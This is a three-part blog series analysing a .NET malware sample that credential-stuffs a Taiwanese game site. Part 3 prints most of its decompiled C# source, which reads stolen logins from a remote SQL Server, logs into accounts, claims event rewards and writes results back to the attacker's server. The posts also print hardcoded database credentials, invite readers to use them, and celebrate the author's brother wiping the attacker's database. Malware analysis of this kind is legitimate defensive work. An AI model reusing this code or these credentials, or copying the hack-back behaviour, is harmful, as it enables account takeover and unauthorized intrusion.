.Net Virus tt6ynew.exe Part 3

Looks like my friends (Sina & Sami) are so eager to know what’s inside the virus so here it is:
 
1) Module1: which is something like program.cs:
 
namespace ConsoleApplication1
{
    using Microsoft.VisualBasic.CompilerServices;
    using System;
    using System.Collections.Generic;
    using System.Threading;
    [StandardModule]
    internal sealed class Module1
    {
        public const string Datatable = "tt2_6y_newzhanghao";
        public const string Gamename = "tt6ynew";
        public static int Onetimes;
        public static int Startid;
        public const string table_users = "tt2_6y_newusers";
        public const string table_zh = "tt2_6y_users";
        public static int Threads;
        [STAThread]
        public static void Main()
        {
            string[] userid = new string[0x3e9];
            string[] password = new string[0x3e9];
            int num = 10;
            int num5 = 0;
            int num3 = 0;
            string server = "ok8.com.ru";
            sql sql = new sql(ref server, "dreader", "reader1006", "allusers");
            while (true)
            {
                try
                {
                    int num2;
                    DateTime now;
                    if (num3 < 3)
                    {
                        now = DateTime.Now;
                    }
                    sql.open();
                    sql.GetConfig(ref Startid, ref Threads, ref Onetimes, ref num2);
                    sql.close();
                    int count = Threads * Onetimes;
                    if ((num3 >= num) | (Startid >= num2))
                    {
                        return;
                    }
                    sql.open();
                    sql.GetUsers("tt2_6y_newzhanghao", Startid, count, ref userid, ref password);
                    sql.close();
                    List<Thread> list = new List<Thread>();
                    int num9 = Threads – 1;
                    for (int i = 0; i <= num9; i++)
                    {
                        string[] strArray4 = new string[0x65];
                        string[] strArray3 = new string[0x65];
                        int num10 = Onetimes – 1;
                        for (int j = 0; j <= num10; j++)
                        {
                            strArray4[j] = userid[(Onetimes * i) + j];
                            strArray3[j] = password[(Onetimes * i) + j];
                        }
                        onethread onethread = new onethread(strArray4, strArray3, i.ToString());
                        if (Threads > 1)
                        {
                            Thread item = new Thread(new ThreadStart(onethread.main));
                            try
                            {
                                item.Start();
                                list.Add(item);
                            }
                            catch (Exception exception1)
                            {
                                ProjectData.SetProjectError(exception1);
                                Exception ex = exception1;
                                Functions.prtError(ex);
                                ProjectData.ClearProjectError();
                            }
                        }
                        else
                        {
                            onethread.main();
                        }
                    }
                    if (Threads > 1)
                    {
                        int num11 = Threads – 1;
                        for (int k = 0; k <= num11; k++)
                        {
                            list[k].Join();
                        }
                    }
                    if (num3 < 3)
                    {
                        TimeSpan span = (TimeSpan) (DateTime.Now – now);
                        num5 = (int) Math.Round((double) (num5 + span.TotalSeconds));
                    }
                    if (num3 == 3)
                    {
                        num = (int) Math.Round((double) ((600.0 / (((double) num5) / 3.0)) – 2.0));
                    }
                    num3++;
                }
                catch (Exception exception3)
                {
                    ProjectData.SetProjectError(exception3);
                    Exception exception2 = exception3;
                    ProjectData.ClearProjectError();
                }
            }
        }
    }
}
 
 
which gets the config annd start the main thread as many as the config says.
 
2) MainThread:
 
namespace ConsoleApplication1
{
    using Microsoft.VisualBasic;
    using Microsoft.VisualBasic.CompilerServices;
    using System;
    using System.Threading;
    public class onethread
    {
        private string check1;
        private string check2;
        private string idc;
        private string[] idcard;
        private sql mysql;
        private web myweb;
        private string pass;
        private string[] password;
        private string points;
        private string threadname;
        private string user;
        private string[] userid;
        private onethread()
        {
            this.userid = new string[0x2711];
            this.password = new string[0x2711];
            this.idcard = new string[0x2711];
            string server = "ok8.com.ru";
            this.mysql = new sql(ref server, "idata", "haha8591", "allusers");
            this.myweb = new web();
        }
        public onethread(string[] userid, string[] password, string threadname)
        {
            this.userid = new string[0x2711];
            this.password = new string[0x2711];
            this.idcard = new string[0x2711];
            string server = "ok8.com.ru";
            this.mysql = new sql(ref server, "idata", "haha8591", "allusers");
            this.myweb = new web();
            this.userid = userid;
            this.password = password;
            this.threadname = threadname;
        }
        public onethread(string[] userid, string[] password, string[] idcard, string threadname)
        {
            this.userid = new string[0x2711];
            this.password = new string[0x2711];
            this.idcard = new string[0x2711];
            string server = "ok8.com.ru";
            this.mysql = new sql(ref server, "idata", "haha8591", "allusers");
            this.myweb = new web();
            this.userid = userid;
            this.password = password;
            this.idcard = idcard;
            this.threadname = threadname;
        }
        public void main()
        {
            string[] othersTab = new string[3];
            string[] others = new string[3];
            othersTab[0] = "renwu";
            othersTab[1] = "jiangpin";
            othersTab[2] = "qu";
            Console.WriteLine("thead" + this.threadname + " was ready!");
            int index = 0;
            while (index < Module1.Onetimes)
            {
                this.user = this.userid[index];
                this.pass = this.password[index];
                index++;
                if (this.user == "")
                {
                    continue;
                }
                this.myweb.Url = "https://secure.plaync.com.tw/login.aspx?returnPage=https%3A%2F%2Fevent%2Eplaync%2Ecom%2Etw%2Fl2event%2FEvent%2F091223%2Fselect%5Fchar%5F6YearsGift%2Easp";
                this.myweb.getHtml("", "utf-8");
                this.check1 = this.myweb.cutContent("__VIEWSTATE" value="", "" />").Replace("=", "%3D").Replace("+", "%2B").Replace("/", "%2F");
                Thread.Sleep((int) (new Random().Next(1, 3) * 0x3e8));
                this.myweb.Url = "https://secure.plaync.com.tw/login.aspx?returnPage=https%3a%2f%2fevent.plaync.com.tw%2fl2event%2fEvent%2f091223%2fselect_char_6YearsGift.asp";
                this.myweb.postData("__VIEWSTATE=" + this.check1 + "&inAccount=" + this.user + "&inPassword=" + this.pass + "&inReturnPage=https%3A%2F%2Fevent.plaync.com.tw%2Fl2event%2FEvent%2F091223%2Fselect_char_6YearsGift.asp&btnLogIn.x=45&btnLogIn.y=20", "", "big5");
                if (Strings.InStr(this.myweb.htmltext, "location.replace(‘", CompareMethod.Binary) != 0)
                {
                    string[] strArray3;
                    Thread.Sleep((int) (new Random().Next(1, 3) * 0x3e8));
                    this.myweb.Url = "https://event.plaync.com.tw/l2event/Event/091223/select_char_6YearsGift.asp";
                    this.myweb.getHtml("", "big5");
                    Random random = new Random();
                    if (random.Next(0, 2) == 1)
                    {
                        strArray3 = Strings.Split(Strings.Split(this.myweb.htmltext, "<option value=", -1, CompareMethod.Binary)[1], ">", -1, CompareMethod.Binary);
                    }
                    else
                    {
                        strArray3 = Strings.Split(Strings.Split(this.myweb.htmltext, "</select>", -1, CompareMethod.Binary)[0], "<option value=", -1, CompareMethod.Binary);
                        strArray3 = Strings.Split(strArray3[strArray3.Length – 1], ">", -1, CompareMethod.Binary);
                    }
                    string str3 = strArray3[0];
                    string str5 = Strings.Split(Strings.Split(this.myweb.htmltext, "strOption" + str3 + " += "<option value=’", -1, CompareMethod.Binary)[1], "’", -1, CompareMethod.Binary)[0];
                    Thread.Sleep((int) (new Random().Next(1, 3) * 0x3e8));
                    this.myweb.Url = "https://event.plaync.com.tw/l2event/Event/091223/game_6YearsGift.asp";
                    this.myweb.postData("chkOk=0&svr=" + str3 + "&char_id=" + str5, "", "big5");
                    while (true)
                    {
                        Thread.Sleep((int) (new Random().Next(1, 3) * 0x3e8));
                        this.myweb.Url = "https://event.plaync.com.tw/l2event/Event/091223/process6YearsGift.asp";
                        this.myweb.postData("chkOk=0&svr=" + str3 + "&char_id=" + str5, "https://event.plaync.com.tw/l2event/Event/091223/game_6YearsGift.asp", "big5");
                        string str4 = this.myweb.cutContent("idx" value="", """);
                        Thread.Sleep((int) (new Random().Next(1, 3) * 0x3e8));
                        this.myweb.Url = "https://event.plaync.com.tw/l2event/Event/091223/show_msg_6YearsGift.asp";
                        this.myweb.postData("chkOk=0&cd=1&idx=" + str4, "https://event.plaync.com.tw/l2event/Event/091223/process6YearsGift.asp", "big5");
                        if (Strings.InStr(this.myweb.htmltext, "恭喜您獲得:", CompareMethod.Binary) == 0)
                        {
                            Console.Write("抽完");
                            goto Label_0472;
                        }
                        string str2 = this.myweb.cutContent("恭喜您獲得:<span class="w2">「", "」");
                        str2 = this.myweb.cutContent("恭喜您獲得:<span class="w2">「", "」");
                        string str = this.myweb.cutContent("道具將置入:<span class="w2">「", "@");
                        this.points = Conversions.ToString(0);
                        others[0] = str;
                        others[1] = str2;
                        others[2] = str3;
                        this.mysql.open();
                        this.mysql.InsertData("tt2_6y_newusers", this.user, this.pass, this.points, othersTab, others);
                        this.mysql.close();
                    }
                }
                Console.WriteLine(this.user + "XXXXXXX");
            Label_0472:
                Console.WriteLine(this.threadname + ": " + Conversions.ToString(index));
            }
            Console.WriteLine("thead" + this.threadname + " was ok!");
        }
    }
}
 
Which is called and do the web callings.
 
3) SQL.cs : which is a sql connection helper:
 
namespace ConsoleApplication1
{
    using Microsoft.VisualBasic.CompilerServices;
    using System;
    using System.Data;
    using System.Data.SqlClient;
    public class sql
    {
        private SqlCommand cmd;
        private SqlConnection conn;
        private sql()
        {
        }
        public sql(ref string server, string userid, string password, string database)
        {
            this.conn = new SqlConnection("Data Source=" + server + ";user id=" + userid + ";password=" + password + ";Initial Catalog=" + database + ";");
        }
        public void close()
        {
            try
            {
                if ((this.conn.State == ConnectionState.Open) | (this.conn.State == ConnectionState.Broken))
                {
                    this.conn.Close();
                }
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception exception = exception1;
                ProjectData.ClearProjectError();
            }
        }
        public void GetConfig(ref int startid, ref int threads, ref int onetimes, ref int totleusers)
        {
            this.cmd = new SqlCommand();
            try
            {
                this.cmd.Connection = this.conn;
                this.cmd.CommandType = CommandType.StoredProcedure;
                this.cmd.CommandText = "get_config";
                this.cmd.Parameters.Add(new SqlParameter("@gname", SqlDbType.NVarChar, 50));
                this.cmd.Parameters["@gname"].Value = "tt6ynew";
                SqlDataReader reader = this.cmd.ExecuteReader();
                reader.Read();
                startid = Conversions.ToInteger(reader.GetValue(reader.GetOrdinal("startid")));
                threads = Conversions.ToInteger(reader.GetValue(reader.GetOrdinal("threads")));
                onetimes = Conversions.ToInteger(reader.GetValue(reader.GetOrdinal("onetimes")));
                totleusers = Conversions.ToInteger(reader.GetValue(reader.GetOrdinal("totleusers")));
                reader.Close();
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception ex = exception1;
                Functions.prtError(ex);
                ProjectData.ClearProjectError();
            }
        }
        public void GetGameid(int startid, int count, ref string[] gameid, ref string[] gamepass)
        {
            try
            {
                this.cmd.CommandTimeout = 100;
                int num2 = startid + count;
                this.cmd = new SqlCommand("select userid,password from now_gash where id>" + Conversions.ToString(startid) + " and id<=" + num2.ToString(), this.conn);
                SqlDataReader reader = this.cmd.ExecuteReader();
                for (long i = 0L; reader.Read(); i += 1L)
                {
                    gameid[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("userid")));
                    gamepass[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("password")));
                }
                reader.Close();
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception ex = exception1;
                Functions.prtError(ex);
                ProjectData.ClearProjectError();
            }
        }
        public void GetUsers(string table, int startid, int count, ref string[] userid, ref string[] password)
        {
            try
            {
                string[] strArray = new string[] { "select userid,password from ", table, " where id>", Conversions.ToString(startid), " and id<=", (startid + count).ToString() };
                this.cmd = new SqlCommand(string.Concat(strArray), this.conn);
                SqlDataReader reader = this.cmd.ExecuteReader();
                for (long i = 0L; reader.Read(); i += 1L)
                {
                    userid[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("userid")));
                    password[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("password")));
                }
                reader.Close();
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception ex = exception1;
                Functions.prtError(ex);
                ProjectData.ClearProjectError();
            }
        }
        public void GetUsers(string table, int startid, int count, ref string[] userid, ref string[] password, ref string[] idcard)
        {
            try
            {
                this.cmd.CommandTimeout = 100;
                string[] strArray = new string[] { "select userid,password,idcard from ", table, " where id>", Conversions.ToString(startid), " and id<=", (startid + count).ToString() };
                this.cmd = new SqlCommand(string.Concat(strArray), this.conn);
                SqlDataReader reader = this.cmd.ExecuteReader();
                for (long i = 0L; reader.Read(); i += 1L)
                {
                    userid[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("userid")));
                    password[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("password")));
                    idcard[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("idcard")));
                }
                reader.Close();
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception ex = exception1;
                Functions.prtError(ex);
                ProjectData.ClearProjectError();
            }
        }
        public void InsertData(string table, string userid, string password)
        {
            try
            {
                this.cmd = new SqlCommand("INSERT INTO " + table + "(userid, password,times) VALUES(‘" + userid + "’,’" + password + "’,getdate())", this.conn);
                this.cmd.ExecuteNonQuery();
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception ex = exception1;
                Functions.prtError(userid, password, ex);
                ProjectData.ClearProjectError();
            }
        }
              public void InsertError(string errorcode)
        {
            try
            {
                errorcode = errorcode.Replace(",", "").Replace("’", "");
                if (this.conn.State == ConnectionState.Closed)
                {
                    this.conn.Open();
                    this.cmd = new SqlCommand("INSERT INTO error(times,errorcode,gamename) VALUES(getdate(),’" + errorcode + "’,’tt6ynew’)", this.conn);
                    this.cmd.ExecuteNonQuery();
                    this.conn.Close();
                }
                else
                {
                    this.cmd = new SqlCommand("INSERT INTO error(times,errorcode,gamename) VALUES(getdate(),’" + errorcode + "’,’tt6ynew’)", this.conn);
                    this.cmd.ExecuteNonQuery();
                }
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception exception = exception1;
                ProjectData.ClearProjectError();
            }
        }
                public void open()
        {
            if (this.conn.State == ConnectionState.Closed)
            {
                try
                {
                    this.conn.Open();
                }
                catch (Exception exception1)
                {
                    ProjectData.SetProjectError(exception1);
                    Exception exception = exception1;
                    ProjectData.ClearProjectError();
                }
            }
        }
    }
}
 
and there wre some other web helper and also an encryption helper too which I don’t think are very helpful. But GOD this man is crazy, he doesn’t change the Database password…
 
By they way I’ve found a very good and helpful Free Utility to connect to DBs called SqlDbx http://www.sqldbx.com/ it is portable and lite (1.00 MB) and it can connect to MS Sql Server & Oracle & DB2 and some other dbs which I don’t work with, but it also have the magical Syntax Highlighting and also some good script auto complete.
 
Hope you’ll find it helpful,
Sadjad Bahmanpour

.Net Virus tt6ynew.exe Part 2

During past night my brother ‘Komeil’ has just deleted all the contents from that mother f…er’s SQL Server and the other day when we checked out he has just changed his SQL server password and as I’ve mentioned in my earlier post the user name and password for the Database is hard coded so the virus cannot do its job any more.
 
as my brother said there were 250,000,000+ record in just one of his tables, WOW… look like he’s been doing just fine.
 
Hey we’ve cleaned one virus from face of internet and I’m proud myself for that 😀
Sadjad Bahmanpour

.Net Virus tt6ynew.exe

Tonight I found a .Net Virus, and I think it is first of its kind. I have thought of it for years to writer a torjan with .net, because no antivirus will think of it as virus and you could do some tricks like Reflection or On the fly class/ code generation and make it so hard to catch, but I’m not no Virus program.
 
But as you might know me, I’m good at .Net Reflection (Thanks to El Mistro ‘Lutz Roeder’ for his great tool Reflector http://www.red-gate.com/products/reflector/) so I tried to reflect the Virus and WOW it worked, so here is some step by step things it do:
 
1) It first tries to connect some Sql Server with these settings: "Data Source=ok8.com.ru;user id=dreader;password=reader1006;Initial Catalog=allusers;"
So be my guest to try that your self
 
2) After connection it gets its config & some users from a table called "tt2_6y_newzhanghao"
 
3) And then starts some Threads (The number is in the config from 2)
 
4) From each Thread it logins to some web site call: https://secure.plaync.com.tw/
 
5) If the 4 succeed it connect to a web page under: https://event.plaync.com.tw/
 
6) After getting some response it inserts some data to the same Sql Server into some table named: "tt2_6y_newusers"
this time with userid=idata and password=haha8591 and Database=allusers
 
And to be honest I don’t know what is that website and don’t know why this JERK who wrote a .Net virus tries to do that whit my connection.
 
Anyway if you knwo somethink about it let me know,
Sadjad Bahmanpour